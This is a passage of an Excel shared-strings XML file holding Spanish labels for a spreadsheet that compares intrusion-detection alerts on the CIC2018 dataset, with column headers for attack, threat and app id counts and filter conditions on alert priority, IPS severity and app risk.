        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <t>Attackids (sin repetición)</t>
  </si>
  <si>
    <t>#Attackids (sin repetición)</t>
  </si>
  <si>
    <t>#Alertas/appid</t>
  </si>
  <si>
    <t>appids (sin repetición)</t>
  </si>
  <si>
    <t>#appids (sin repetición)</t>
  </si>
  <si>
    <t>#Flujos con Ataques detectados (appid)</t>
  </si>
  <si>
    <t>threat_ids (sin repetición)</t>
  </si>
  <si>
    <t>#threat_id (sin repetición)</t>
  </si>
  <si>
    <t>#appid (sin repetición)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">RS1 </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">[Priority </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&lt;= 4</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS2</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS3</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS4</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS5</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS6</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS7</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS8</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS9</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <t>T0846-Remote_System_Discovery_FIN1</t>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity &gt;= 1 (</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PA</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>[</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IPS severity_number &gt;= 1 (</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> [Priority </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&lt;= 3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Any)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> [Priority </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&lt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Any)</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</si>
  <si>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&gt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)] || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> ] ||
[App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] ||
 [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> ] ||
[App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] ||
 [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> ] ||
[App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] ||
 [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> ] ||
[App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> [IPS severity_number </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] ||
 [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PA</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>[</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IPS severity_number="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]  || [App risk_of_app="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PA</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>[</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IPS severity_number="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"] || [App risk_of_app="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any"</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>] || [APP apprisk="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NOTA: El tráfico de ataques del dataset CIC2018 es </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>sintético</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (insertado sobre el legítimo)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> [Priority </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&lt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Any)</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</si>
  <si>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&gt;=5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=5</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</si>
  <si>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&gt;=5</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</si>
  <si>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&gt;=5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=5</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</si>
  <si>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&gt;=5</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</si>
  <si>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&gt;=4</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</si>
  <si>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&gt;=4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 4</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</si>
  <si>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&gt;=4</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</si>
  <si>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&gt;=4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> ] || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=4</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</si>
  <si>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&gt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App apprisk </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 3</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</si>
  <si>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&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</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</si>
  <si>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&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">] || [App risk_of_app </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;= 2</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</si>
  <si>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&gt;=2</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</si>
  <si>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&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
